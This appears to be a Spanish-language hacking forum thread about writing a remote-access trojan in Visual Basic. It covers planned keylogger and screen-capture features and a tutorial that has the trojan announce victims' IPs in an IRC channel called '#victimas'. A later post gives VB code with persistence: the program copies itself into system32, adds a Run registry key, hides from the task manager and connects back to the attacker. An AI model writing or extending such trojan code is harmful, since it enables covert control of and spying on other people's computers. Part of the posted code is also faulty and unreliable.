gracias a todos!!, con lo dicho ya se puede hacer un troyano con funciones basicas pero que te dan todo el control... pero aun me gustaria hacer como otro apartado esplicando mas funciones extras:

1-captura de pantalla
2-keylogger
3-escritorio remoto
4-chorradas varias de tipo, abrir cd, ocultar esto y aquello y etc...

.. lo que yo tengo aun que aprender es:

1-un editor para el servidor del troyano
2-seleccionar una ventana que tenga abierta de lo que sea y escribir en ella
3-un scaner para ver que victimas ay conectadas en este momento,( por conexion inversa claro)

si alguien sabe de esto y se anima a esplicarlo paso por paso esas funciones, pues bienvenido sea!!!! pero no un copy paste, una esplicacion de como se hace y que es cada linea de codigo escrita!! GRACIAS!!!!!!!!!!

aver si pronto vuelvo y esplico aquello!

un saludo!!                 --xenon--

Keyyloger
Capturar pantalla
injection de porcesos esta en laboratorio

por ahi puedes sacar algo de info, por otro lado clap clap clap, brooo, en linea como siempre


saluuuos
Man-In-the-Middle

-----------------------------------------------------------------------------

hola de nuevo, voy a explicar como programar en vb y en nuestro troyano hecho desde cero, que el servidor notifique su ip y los datos que queramos por IRC, osea: NOTIFICACION POR IRC

el troyano que esplique esta diseñado para conexion inversa, asi que noseria necesario esto, pero viene bien para tener recojidas alas victimas todas juntas en un canal de irc, en el cual nos conectemos y veamos que victimas ay on-line:

esto es mas sencillo de lo que parece, primero voy a explicar MUY de refilon el protocolo IRC;

abrir una consola de telnet, ahora escribir esto:


con esto establecemos una conexion con el servidor luna.irc-hispano.org por el puerto 6667, un puerto tipico de estos servidores, acontinuacion el servidor nos respondera con el siguiente mensaje:

bien, ahora que el servidor nos a saludado, tenemos que decirle  quienes somos y algun dato mas, veamoslo, escribir esto:


y seguidamente:


con esto le hemos dicho al servidor nuestro nick y en el siguiente comando,
 -user- es un "comando" del protocolo,
-mañanamadrugo- seria el nombre que le damos al servidor de nuestro usuario,
-4- es una mascara para la identificacion, que corresponde al modo +w, (si no entendeis esto bajaros un manual de irc o hecharle un ojo al protocolo, google: buscar protocolo irc, no es obligatorio pero si recomendable) no todos los servidores admiten esto, en caso contrario se omitiria ese campo y se pone en su lugar un cero,
-*- este campo no se usa con lo cual se pone cualkier cosa,
-:- separa todo eso de lo siguiente que es nuestro nombre real
-y aqui estoy esplicando esto- esto es el campo de el nombre real, puede tener espacios en blanco entre medio, y podeis poner la chorrada que querais, cualquier cosa menos lo que teoricamente habria que poner, osea nuestro nombre real, que les importara a ellos? poned lo que querais aqui

con esto ya estais identificados en el servidor, y ya teneis aceso a el, ahora si en algun momento veis este mensaje:

PING : 112398546

tendreis que responder rapidamente:

pong : 112398546

pong : y lo mismo que ponia en el ping, si no se responde asi, te caes del servidor, es una medida para saber que usuarios siguen en linea, y cuales no, como medida para tirar las conexiones que no pintan nada en el servidor... asi dais señales de vida y el servidor os dejara seguir con lo vuestro

entrar a un canal:


os saldra un mensajito del servidor, confirmando que lo habeis hecho bien:

ahora para hablar en el canal:


con esto ya podeis entender el codigo y vereis que facil es hacerlo, entendiendo antes como funciona!!!!!!!
-------------------------------------------------------------------------

visual basic,nuevo proyecto, exe estandar y añadis lo siguiente:
componente microsoft winsock  renombrado a ws, 2 timer, y un boton:

1ª mision, conectar al servidor:


si habeis seguido el curso entendereis todo este codigo y sobra esplicarlo!
pero lo que hemos hecho ay es que al pulsar el boton, conecte al servidor, se ponga el interruptor empezar a true y el intervalo de uno de los timer se ponga a 2 segundos.

2ª mision, identificarnos!


al conectar y pasar 2 segundos, al estar activado el interruptor empezar, envia el comando "nick" con el nick y pulsa retorno de carro, el interruptor empezar se desconecta, y al pasar 2 segundos se vuelve a revisar el codigo del timer1 y como el interruptor empezar esta desactivado manda el comando "usuario" con los parametros correspondientes, pone el timer1 a 0 por que ya no se va a usar esto y pone el timer2 a 4 segundos para seguir con la 3ª mision.

3ª mision, entrar en el canal #victimas(por ejemplo) y escribir en el canal la ip, el puerto, y lo que nos de la gana:


por defecto el interruptor user esta apagado, por tanto:

cada 4 segundos, si el interruptor user esta apagado, entra en el canal victimas, se pone el interruptor user encendido, asi que al volver a pasar 4 segundos NO volvera a entrar en el canal y escribira en el canal , la ip de la victima, el nombre, el puerto y lo que nos apetezca.

4ª mision, NO CAERNOS! por culpa del ping:


si los primeros 6 datos que nos lleguen son igual a "PING :" entonces coje el resto de los datos que an llegado y los metes en la variable datos, luego mandas al servidor "pong :" y los datos, osea lo que ay que responderle al ping, (se le responde con lo mismo!!)

YA ESTA! ahora coje este codigo y implementalo en tu troyano, cosa facil, esperimentalo antes, haz pruebas cambia esos 4 segundos por un minuto o yo que se... y cambiar el nick por alguno raro raro, por que si no el server respondera como que ya esta usado y no funcionara!
es muy facil implementarlo al troyano, si ay dudas preguntar!!!!!


espero que os sirva este pequeño tutorial, aver si esplico mas cosas utiles otro dia como prometi !! hasta otra!!

un saludo!!  Xenon, alias fulano_

ya que estamos, por si esto lo lee alguna empresa decir que busco  curro relacionado con la informatica...ineteresados mandenme un mail

ya se que no viene al caso, y eso ya seria mucha suerte, pero oye quien sabe!

es un chiste malo

si no te pone el comando dentro del bat sera por que algo pondras mal enel codigo, postea el codigo y lo vemos

acabo de empezar, y cuando acabe la primera parte (client y servidor) al ejecutar el cliente me da error y me señala la linea de comando ws.senddata text2.text :S

el codigo lo tengo asi k alguien me ayude a ver k tengo mal y poder solucionarlo para poder acabar el minicurso

Dim ipftp As String
Dim port As Integer
Dim ejec As String
Dim ip As String

Private Sub escuchar_Click()
On Error Resume Next                                      'esta linea sirve para que en caso de error siga el programa en la siguiente linea sin interrumpirlo
WS.LocalPort = Text1.Text                              'el puerto que empleara el winsock sera el que introduzcas en un textbox, AÑADELO
WS.Close                                                            'ws llama al objeto winsock que hemos agregado el punto te deja elegir opciones, y la opcion close es para que cierre la conexiono el puerto abierto
WS.Listen                                                           'deja ala escucha el puerto introducido en el textbox
If WS.State = 2 Then Label1.Caption = "Escuchando"            'si el estado del winsock es (escuchando) entonces la propiedad caption de la etiketa sera "Escuchando" asi que ya estas añadiendo un label(etiketa), esto es util para ver si de verdad esta escuchando o no, ya que si ese puerto ya estubiera abierto no te dejaria abrirlo para este programa, de ay tambien lo de ws.close antes...
End Sub

Private Sub Command1_Click()
WS.SendData text2.Text
End Sub


Private Sub Form_Load()
Dim win
Dim sys
Dim residencia
On Error Resume Next
ip = "127.0.0.1"                             'esta es nuestra ip local, asi que conectara a nuestra ip local, aqui se pondria nuestra ip publica, y si cambia pues os registrais en no-ip.com y si habeis leido la revista no tendreis problemas
ipftp = "o 127.0.0.1"
port = 6969
WS.RemoteHost = ip
WS.RemotePort = port
Timer1.Interval = 60000     'se esteblace un intervalo de 3 segundos para ejecutar el evento timer1
ejec = App.Path                                    'le pasamos a la variable la ruta del exe que ejecute la victima
If Right(ejec, 1) <> "\" Then ejec = ejec & "\"    'si no tiene la "\" al final, se la añadiremos
ejec = ejec & App.EXEName & ".exe"                 'añadimos ala ruta del exe, el nombre y la estension
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0)                    'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)                                     'las ponemos en minusculas
sys = LCase(sys)
FileCopy ejec, sys & "\nombre1"                     'copia a windows\system32
Name sys & "\nombre1" As sys & "\nombre2.exe"       'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "\nombre2.exe"  'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False          'para ocultarlo un poco del, (alt +sup +control)
End Sub

Private Sub Timer1_Timer() 'al pasar 3 segundos de establecerse la conexion
On Error GoTo error
If Not WS.State = 7 Then                       'si el estado de la conexion no es (conectado) entonces que me ponga en una etekita "Desconectado"
Label1.Caption = "Desconectado"
Else
End If
If WS.State = 7 Then
Label1.Caption = "Conectado"
Else
End If
If Label1.Caption = "Desconectado" Then     'si pone desconectado en el label, entonces ejecuta lo de la etiketa puente,"cerrar y volver a escuchar"
Label1.Caption = "Desconectado"
GoTo puente
Else
End If
GoTo error                                               'puentea y se salta el cierre y vuelta a escuchar la conexion, para que seguir normalmente con la conexion establecida
puente:
WS.Close
WS.Listen
error:
End Sub

Private Sub ws_ConnectionRequest(ByVal requestID As Long)         'cuando se intente conectar a este (servicio,puerto,socket,o etc..) recojera su ip y ejecutara el siguiente codigo:
On Error GoTo error                                                                                'si ay un error ves ala etiketa (error)
WS.Close                                                                                                  'necesario para aceptar la conexion
WS.Accept requestID                                                                            'acepta cualquier conexion entrante
Label3.Caption = WS.RemoteHostIP                                                   'añades otra etiketa y esto hara que te ponga la ip remota del servidor
Shell "c:\ki.bat"                                                                                       'esto ejecuta un archivo, yo lo puse para que ejecutase un sonido y asi coscarme de cuando se me conecta la victima, osea el servidor
Timer1.Interval = 3000                                                                            '3 segunditosss, sobra decir que tienes que añadirlo asi que ahora sere mas concreto por que ya presupongo que as aprendido algo de vb de la revista, o con solo averlo visto por encima y jugueteado un poco con el , entenderas todo lo que digo, y sino ya pregunhtareis
error:
End Sub


y en el formulatio tengo, 2 botones 1 label 1 textbox 1 control timer y un control winsock.
gracias por las proximas respuestas